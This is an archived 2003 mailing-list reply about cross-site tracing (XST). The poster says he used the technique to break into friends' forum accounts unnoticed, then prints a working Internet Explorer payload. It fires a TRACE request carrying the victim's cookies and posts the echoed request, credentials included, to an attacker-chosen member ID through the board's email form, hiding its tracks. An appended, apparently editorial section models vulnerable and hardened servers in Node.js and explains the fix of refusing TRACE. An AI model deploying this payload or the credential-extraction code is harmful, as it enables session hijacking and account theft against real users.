Re: TRACE used to increase the danger of XSS.

From: Phrack (securityat_private)
Date: Thu Jan 23 2003 - 17:08:28 PST


    It's really a terrible security hole.  Using this method, I have hacked some BBS accounts of my friends. If you do it properly, it wouldn't be noticed by the victim. The following is my code:
    
    <script type="text/javascript">
    // Cross-site tracing (XST) payload for IE of the time. The code runs inside
    // a showModalDialog opened on the target origin, so its TRACE request
    // carries the victim's cookies; the TRACE echo (the whole request, headers
    // included) is then POSTed to the board's own "email member" form,
    // addressed to userid 11111.
    function xssDomainTraceRequest() {

      var exampleCode =
        'var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");' +
        // Synchronous TRACE: the response body is the echoed request.
        'xmlHttp.open("TRACE", "http://bbs.for.bar", false);' +
        'xmlHttp.send();' +
        'xmlDoc = xmlHttp.responseText;' +
        // Exfiltrate the echoed request through member.php on the same site.
        'xmlHttp.open("POST", "http://bbs.for.bar/member.php", false);' +
        'xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");' +
        'xmlHttp.send("s=&action=emailmessage&userid=11111&subject=test&message=" + xmlDoc);';

      var target = "http://bbs.for.bar";

      // Close the dialog when finished so the victim sees nothing.
      var cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
      // The dialog features string is parsed like CSS; IE's expression() lets it
      // run script, and execScript evaluates the decoded payload in the dialog's
      // (target) origin.
      var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';
      showModalDialog(target, null, readyCode);
    }
    </script>

    <script>
    xssDomainTraceRequest();
    </script>
    
    Chen haiyan, CISSP
    System Security Engineer
    HENAN CFONLINE COMMERCE CO., LTD.
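The post relies on the server echoing the TRACE request back, including headers the attacker's script could never read directly (the Cookie and Authorization headers the browser attaches on the victim's behalf). The example below is added here and is not part of the original message or of any board software: it models both sides of that exchange in plain Node.js, with a small HTTP message parser, a server that echoes TRACE the way RFC 2616 describes, a hardened server that refuses the method with 405, and the client-side extraction of the echoed credentials. The sample request, host name, cookie names and credentials are constructed for illustration.

```javascript
'use strict';

// Headers whose echo is the whole point of cross-site tracing (XST):
// cookies (including HttpOnly ones) and HTTP authentication.
const SENSITIVE = ['cookie', 'authorization', 'proxy-authorization'];

// Parse a raw HTTP/1.1 request (what a TRACE body contains) into
// { method, target, version, headers }. Header names are lower-cased,
// folded continuation lines are joined, repeated headers are comma-joined.
function parseHttpMessage(raw) {
  const [head] = raw.split(/\r?\n\r?\n/, 1);
  const lines = head.split(/\r?\n/);
  const [method, target, version] = lines[0].trim().split(/\s+/);
  const headers = {};
  let last = null;
  for (const line of lines.slice(1)) {
    if (/^[ \t]/.test(line) && last) { headers[last] += ' ' + line.trim(); continue; }
    const idx = line.indexOf(':');
    if (idx < 0) continue;
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    headers[name] = name in headers ? headers[name] + ', ' + value : value;
    last = name;
  }
  return { method, target, version, headers };
}

// Client side: given a TRACE response, return the sensitive headers the
// server echoed, or null when TRACE is not enabled (no 200 + message/http).
function extractEchoedCredentials(resp) {
  const ct = (resp.headers['content-type'] || '').toLowerCase();
  if (resp.status !== 200 || !ct.startsWith('message/http')) return null;
  const echoed = parseHttpMessage(resp.body);
  const found = {};
  for (const name of SENSITIVE) {
    if (name in echoed.headers) found[name] = echoed.headers[name];
  }
  return found;
}

// Model of a server with TRACE enabled: the request is reflected verbatim.
function vulnerableServer(rawRequest) {
  return { status: 200, headers: { 'content-type': 'message/http' }, body: rawRequest };
}

// Model of a hardened server: TRACE is rejected before any handler runs
// (the equivalent of Apache's "TraceEnable off").
function hardenedServer(rawRequest) {
  const req = parseHttpMessage(rawRequest);
  if (req.method === 'TRACE') {
    return { status: 405, headers: { allow: 'GET, HEAD, POST' }, body: '' };
  }
  return { status: 200, headers: { 'content-type': 'text/plain' }, body: 'ok' };
}

// Constructed sample: what the victim's browser would send for the post's
// xmlHttp.open("TRACE", "http://bbs.for.bar") while logged in. Cookie and
// credential values are made up.
const SAMPLE_TRACE_REQUEST = [
  'TRACE / HTTP/1.1',
  'Host: bbs.for.bar',
  'Cookie: session=0123456789abcdef; remember=1',
  'Authorization: Basic YWxpY2U6czNjcjN0',
  'Accept: */*',
  '', ''
].join('\r\n');

// Run the same request against both server models.
function demo() {
  return {
    vulnerable: extractEchoedCredentials(vulnerableServer(SAMPLE_TRACE_REQUEST)),
    hardened: extractEchoedCredentials(hardenedServer(SAMPLE_TRACE_REQUEST)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Against the echoing server the client gets back the session cookie and the Basic credentials; against the hardened one it gets nothing, which is the whole mitigation: the browser-side sandbox cannot stop a page on the target origin from sending TRACE, so the method has to be refused on the server (or at the reverse proxy in front of it).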
    
    



    This archive was generated by hypermail 2b30 : Fri Jan 24 2003 - 10:14:05 PST